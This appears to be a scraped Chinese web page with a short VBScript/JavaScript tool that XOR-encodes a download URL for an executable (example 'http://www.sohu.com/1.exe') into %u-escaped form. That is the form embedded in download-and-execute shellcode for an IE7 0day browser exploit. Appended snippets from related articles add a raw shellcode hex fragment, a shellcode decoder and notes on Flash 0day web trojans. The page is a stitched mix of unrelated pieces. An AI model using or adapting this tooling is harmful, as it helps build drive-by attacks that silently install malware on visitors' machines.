ie7 0day当中的shellcode的escape+xor21加密_vbs

<SCRIPT LANGUAGE="VBSCRIPT">
Function Encode(s,n)
Dim b
b=UCase(s)
For i=1 To Len(b)
Encode=Encode&Chrw((Asc(Mid(b,i,1)) Xor n))
Next
End Function
</script>
<script language="javascript">
myrand=window.prompt("url:","http://www.sohu.com/1.exe");
strVariable = (Encode(myrand,0x21)).toUpperCase( )
function gen(url)
{
var i=0,l=0,k=0,curl="";
l= url.length;
for(;i<l;i++){
k=url.charCodeAt(i);
if(k<16)curl+="0"+k.toString(16);else curl+=k.toString(16);}
if (l%2){curl+="00";}else{curl+="0000";}
curl=curl.replace(/(..)(..)/g,"%u$2$1");
return curl;
}
document.write(gen(strVariable));
</script>

时间: 2024-09-23 20:50:18

ie7 0day当中的shellcode的escape+xor21加密_vbs的相关文章

绿盟科技针对IE7 0day漏洞提出建议

[51CTO.com 综合报道]IE7浏览器惊爆一个新漏洞.IE7 0day漏洞--年末的又一枚炸弹12月9日, IE7浏览器惊爆一个新漏洞--微软至今尚未提供该漏洞补丁,该漏洞被确 认为"0day"漏洞--此漏洞被发现后通过地下漏洞黑市交易而扩散,进而被大量"挂马"攻击者所利用--该漏洞与Microsoft Internet Explorer 7紧密相关,如果HTML文件中有错误格式的标签,可以导致微软IE 7浏览器使用已被释放的内存作为虚函数指针进行调用.利用此

vbs shellcode转换escape加密_vbs

'code by NetPatch code="\x29\xc9\x83\xe9\xa1\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x92\x06\x5b\x18\x83\xeb\xfc\xe2\xf4\x79\x16\x01\x52\xa1\xcf\x3d\xa1\xae\x07\xdb\x2c\x98\x9f\xb9\xe2\x79\x03\xb3\xf3\x6d\xf9\xa4\x68\xde\x9f\xc2\x81\x51\xfb\x63\xb1\x

alpha2 shellcode解密的vbs脚本_vbs

复制代码 代码如下: Dim enTmp,enstr,a,bb  enstr=Str2Hex("RHptd4RPFZVOdoVQTrvWTnTp4n6PVN6QTop1tnau1hsU")  For i = 1 To Len(enStr) step 6     enTmp =Array(Mid(enStr,i,6)&"00")     sz =Split(enTmp(0), ",", -1, 1)  a= right(sz(0), 1) 

FLASH 0DAY 详细分析和总结图文_漏洞研究

最近FLASH出了几个0DAY,论坛也帖了相关的新闻信息(请见:http://bbs.tian6.com/viewthread.php?tid=4434&extra=&page=1).我也约在5天前开始对此进行研究.我记得同时间邪恶八进制也有人开始同样的研究.到目前为止,该0DAY可以影响到90.115这个版本.而邪八那边的研究,先在两天前宣布成功完成.这又给我带来不小的压力.. (一)作为研究的初步,通过TIM的帮助,我从几个被挂马的页面得到2个SWF网马.反编译后得知这两个SWF在获得

微软IE 7 0day漏洞解析网民的“定时炸弹”

[51CTO.com 综合报道]12月9日,就在微软发布最新漏洞补丁的前一天,微软IE 7 曝出严重0day漏洞,金山毒霸等安全厂商 纷纷发布紧急预警.就在大家都以为12月10日微软会公布这一漏洞的相关信息,并发布漏洞修复补丁的时候.12月10,在微软公布的最新漏洞补丁中并无法修复该漏洞.由此,IE 7 0day漏洞的危害仍在继续.微软IE 7 0day漏洞介绍:微软IE 7 0day漏洞是一个基于IE7浏览器内核的漏洞,所有基于IE7内核的浏览器和应用程序都会成为攻击对象.如傲游.世界之窗.腾

JSP页面中文传递参数使用escape编码_JSP编程

今天在使用中文传递参数时,遇到死活编码转不过去,于是想到了用escape,在使用后 request.getParameter接收不到参数,于是想着怎么能够接收到参数. 经过试验,通过 复制代码 代码如下: zbtmp=escape(escape(zbtmp));//加密2次danielinbiti var params = "name="+zbtmp; window.open('showzsgraph.jsp?params); 然后可以通过request.getParameter获取到

NetSarang的Xmanager和Xshell多种产品被植入后门 绿盟科技发布分析与防护方案

NetSarang的Xmanager和Xshell等远程连接产品在日常安全运维中使用量不小,但不幸的是,近日安全公司发现官方发布的软件版本中,nssock2.dll模块源码被植入后门.绿盟科技发布技术分析与防护方案,报告全文如下 netsarang软件中的nssock2.dll模块被植入恶意代码的技术分析与防护方案 NetSarang是一家提供安全连接解决方案的公司,该公司的产品主要包括Xmanager, Xmanager 3D, Xshell, Xftp 和Xlpd.最近,官方在2017年7月

JAVASCRIPT加密解密终级指南

javascript|加密|解密 本文一共介绍了七种方法一最简单的加密解密二转义字符"\"的妙用三使用Microsoft出品的脚本编码器Script Encoder来进行编码 自创简单解码四任意添加NUL空字符十六进制00H 自创五无用内容混乱以及换行空格TAB大法六自写解密函数法七错误的利用 自创 在做网页时其实是网页木马呵呵最让人烦恼的是自己辛辛苦苦写出来的客户端IE运行的JAVASCRIPT代码常常被别人轻易的拷贝实在让自己的心里有点不是滋味要知道自己写点东西也挺累的......

&amp;#106avascript加密解密7种方法

加密|解密    本文一共介绍了七种JAVASCRIPT加密方法 在做网页时其实是网页木马呵呵最让人烦恼的是自己辛辛苦苦写出来的客户端IE运行的JAVASCRIPT代码常常被别人轻易的拷贝实在让自己的心里有点不是滋味要知道自己写点东西也挺累的......^*^ 但我们也应该清楚地认识到因为JAVASCRIPT代码是在IE中解释执行要想绝对的保密是不可能的我们要做的就是尽可能的增大拷贝者复制的难度让他知难而退但愿~!~下面我结合自己这几年来的实践及个人研究的心得和大家一起来探讨一下网页中JAVAS